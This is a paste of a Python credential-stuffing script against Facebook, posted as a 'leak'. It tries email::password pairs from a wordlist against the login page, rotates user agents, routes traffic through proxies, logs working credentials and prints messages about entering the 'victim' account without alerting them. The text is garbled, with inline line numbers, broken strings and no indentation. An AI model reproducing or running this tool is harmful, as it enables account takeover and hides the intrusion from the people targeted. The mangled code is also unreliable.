Bf for FB by r3v3ng3

1. All this has been leaked by @_.r3v3ng3._, if you re-use, please give credit.
2. @_.r3v3ng3._
3. PYTHON SCRIPT FOR DICTIONARY ATTACK AGAINST FACEBOOK by r3v3ng3
4.  
5. import re
6. import os
7. import sys
8. import random
9. import warnings
10. import time
11. try:
12. import mechanize
13. except ImportError:
14. print "[*] Please install mechanize python module first"
15. sys.exit(1)
16. except KeyboardInterrupt:
17. print "\n[*] Exiting program...\n"
18. sys.exit(1)
19. try:
20. import cookielib
21. except ImportError:
22. print "[*] Please install cookielib python module first"
23. sys.exit(1)
24. except KeyboardInterrupt:
25. print "\n[*] Exiting program...\n"
26. sys.exit(1)
27.  
28. warnings.filterwarnings(action = "ignore", message = ".*gzip transfer encoding is experimental!", category = UserWarning)
29.  
30. # define variable
31. __Script__ = "Facebook Pentester 2014 Priv8888!"
32. __Released__ = "27/01/2014 By Mauritania Attacker"
33. __moi__ = "Facebook Checkpoint Security Bypassed 100%"
34. verbose = False
35. useproxy = False
36. usepassproxy = False
37. log = 'ghost.log'
38. file = open(log, "a")
39. success = 'home_edit_profile'
40. checkpoint = 'checkpoint'
41. oldpass = 'You entered an old password'
42. fblogin = 'https://login.facebook.com/login.php?login_attempt=1'#
43. some priv8 useragents
44. for Facebook Security!
45. useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
46. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
47. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
48. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
49. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
50. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
51. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
52. 'Opera/8.00 (Windows NT 5.1; U; en)',
53. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
54. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
55. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
56. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
57. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
58. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
59. ]
60. facebook = ''
61. '
62.  
63. #
64. Facebook Pentester 2014 Priv8.#Coded By Mauritania Attacker.#Features: Verbose Method + Intrusion.#Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.
65.  
66. Script: % s
67. New Security Bypass: % s
68. Released: % s ''
69. ' % (__Script__, __moi__, __Released__)
70. option = ''
71. '
72. Usage: % s - w pentest.txt
73. Option: -w, --wordlist < filename > | Wordlist used
74. for Cracking
75. - v, --verbose | Set % s will be verbose - p, --proxy < host: port > | Set http proxy will be use - k, --usernameproxy < username > | Set username at proxy will be use - i, --passproxy < password > | Set password at proxy will be use - l, --log < filename > | Specify output filename(
76. default: ghost.log) - h, --help < help > | Print this help
77.  
78. Example: % s - w pentest.txt "
79.  
80. P.S: add "&"
81. to run in the background ''
82. ' % (sys.argv[0], sys.argv[0], sys.argv[0])
83. hme = ''
84. '
85. Usage: % s - w pentest.txt - h or--help
86. for get help
87. ''
88. ' % sys.argv[0]
89.  
90. def helpme():
91. print facebook
92. print option
93. file.write(facebook)
94. file.write(option)
95. sys.exit(1)
96.  
97. def helpmee():
98. print facebook
99. print hme
100. file.write(facebook)
101. file.write(hme)
102. sys.exit(1)
103.  
104. for arg in sys.argv:
105. try:
106. if arg.lower() == '-u'
107. or arg.lower() == '--user':
108. username = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
109. elif arg.lower() == '-w'
110. or arg.lower() == '--wordlist':
111. wordlist = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
112. elif arg.lower() == '-l'
113. or arg.lower() == '--log':
114. log = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
115. elif arg.lower() == '-p'
116. or arg.lower() == '--proxy':
117. useproxy = True
118. proxy = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
119. elif arg.lower() == '-k'
120. or arg.lower() == '--userproxy':
121. usepassproxy = True
122. usw = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
123. elif arg.lower() == '-i'
124. or arg.lower() == '--passproxy':
125. usepassproxy = True
126. usp = sys.argv[int(sys.argv[1: ].index(arg)) + 2]
127. elif arg.lower() == '-v'
128. or arg.lower() == '--verbose':
129. verbose = True
130. elif arg.lower() == '-h'
131. or arg.lower() == '--help':
132. helpme()
133. elif len(sys.argv) <= 1:
134. helpmee()
135. except IOError:
136. helpme()
137. except NameError:
138. helpme()
139. except IndexError:
140. helpme()
141.  
142. def bruteforce(word):
143. try:
144. pos = word.find("::")
145. userEmail = word[0: pos]
146. word = word[pos + len("::"): len(word)]
147.  
148. print("userEmail: " + userEmail)
149. print("password: " + word)
150. file.write("[*] Trying " + userEmail + "::" + word + "\n")
151. sys.stdout.flush()
152. rch = random.choice(useragent)
153. br.addheaders = [('User-agent', rch)]# print("User Agent: " + rch)
154. opensite = br.open(fblogin)
155.  
156. # To show and print all forms name#
157. for form in br.forms(): #print "Form name:", form.name# print form
158.  
159. # To show all control elements in the form# br.form = list(br.forms())[0]#
160. for control in br.form.controls: #print control# print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])
161.  
162. # To dump cookies data being sent and received# dump();
163.  
164. #
165. Release email account from autotext fill# If email still auto - filled on login form, this script would not work as expected, so we need to release it
166.  
167. NotMe = "notme_cuid"
168. for link in br.links():
169. if (NotMe in link.url):
170. request = br.click_link(link)
171. response = br.follow_link(link)# print response.geturl()
172.  
173. br.select_form(nr = 0)
174.  
175. br.form = list(br.forms())[0]
176. br.form['email'] = userEmail
177. br.form['pass'] = word
178. br.submit()
179. response = br.response().read()
180.  
181. if verbose:
182. print response
183. if success in response:
184. print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
185. print "[*] userEmail : %s" % (userEmail)
186. print "[*] Password : %s\n" % (word)
187. file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
188. file.write("\n[*] userEmail : %s" % (userEmail))
189. file.write("\n[*] Password : %s\n\n" % (word))
190.  
191. # After the successful login, force to Logout(to clear the cookies & the session - Very important!)
192. for form in br.forms():
193. if form.attrs['id'] == 'logout_form':
194. br.form = form
195. br.submit()
196. elif checkpoint in response:
197. print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
198. print "[*] userEmail : %s" % (userEmail)
199. print "[*] Password : %s\n" % (word)
200. file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
201. file.write("\n[*] userEmail : %s" % (userEmail))
202. file.write("\n[*] Password : %s\n\n" % (word))
203.  
204. # In checkpoint, this account maybe has been logged in , so we need to Log it Out after the successful login
205. LogOut = "logout.php"
206. for link in br.links():
207. if (LogOut in link.url):
208. request = br.click_link(link)
209. response = br.follow_link(link)# print response.geturl()# print "This account has been logged out"#
210. else :#print "Can not click Log Out link"
211.  
212. except KeyboardInterrupt:
213. print "\n[*] Exiting program...\n"
214. sys.exit(1)
215. except mechanize._mechanize.FormNotFoundError:
216. print "\n[*] Form Not Found\n"
217. file.write("\n[*] Form Not Found\n")
218. sys.exit(1)
219. except mechanize._form.ControlNotFoundError:
220. print "\n[*] Control Not Found\n"
221. file.write("\n[*] Control Not Found\n")
222. sys.exit(1)
223.  
224. # Priv8 Function to Dump Cookies Data# def dump(): #for cookie in cj: #print cookie.name, cookie.value
225.  
226. def releaser():
227. global word
228. for word in words:
229. bruteforce(word.replace("\n", ""))
230.  
231. def main():
232. global br
233. global words# Priv8 Function to enable dump()# global cj
234. try:
235. br = mechanize.Browser()
236. cj = cookielib.LWPCookieJar()
237. br.set_cookiejar(cj)
238. br.set_handle_equiv(True)
239. br.set_handle_gzip(True)
240. br.set_handle_redirect(True)
241. br.set_handle_referer(True)
242. br.set_handle_robots(False)
243. br.set_debug_http(False)
244. br.set_debug_redirects(False)
245. br.set_debug_redirects(False)
246. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
247. if useproxy:
248. br.set_proxies({
249. "http": proxy
250. })
251. if usepassproxy:
252. br.add_proxy_password(usw, usp)
253. if verbose:
254. br.set_debug_http(True)
255. br.set_debug_redirects(True)
256. br.set_debug_redirects(True)
257. except KeyboardInterrupt:
258. print "\n[*] Exiting program...\n"
259. file.write("\n[*] Exiting program...\n")
260. sys.exit(1)
261. try:
262. preventstrokes = open(wordlist, "r")
263. words = preventstrokes.readlines()
264. count = 0
265. while count < len(words):
266. words[count] = words[count].strip()
267. count += 1
268. except IOError:
269. print "\n[*] Error: Check your config path\n"
270. file.write("\n[*] Error: Check your config path\n")
271. sys.exit(1)
272. except NameError:
273. helpme()
274. except KeyboardInterrupt:
275. print "\n[*] Exiting program...\n"
276. file.write("\n[*] Exiting program...\n")
277. sys.exit(1)
278. try:
279. print facebook
280. print "\n[*] Starting Cracking at %s" % time.strftime("%X")# print "[*] Account To Crack %s" % (username)
281. print "[*] Loaded :", len(words), "words"
282. print "[*] Cracking, please wait..."
283. file.write(facebook)
284. file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))# file.write("\n[*] Account To Crack %s" % (username))
285. file.write("\n[*] Loaded : %d words" % int(len(words)))
286. file.write("\n[*] Cracking, please wait...\n")
287. except KeyboardInterrupt:
288. print "\n[*] Script Closed...\n"
289. sys.exit(1)
290. try:
291. releaser()
292. bruteforce(word)
293. except NameError:
294. helpme()
295.  
296. if __name__ == '__main__':
297. main()
298.  
299.  
300. Leaks, leaks, leaks psycho with database
301. @_.r3v3ng3._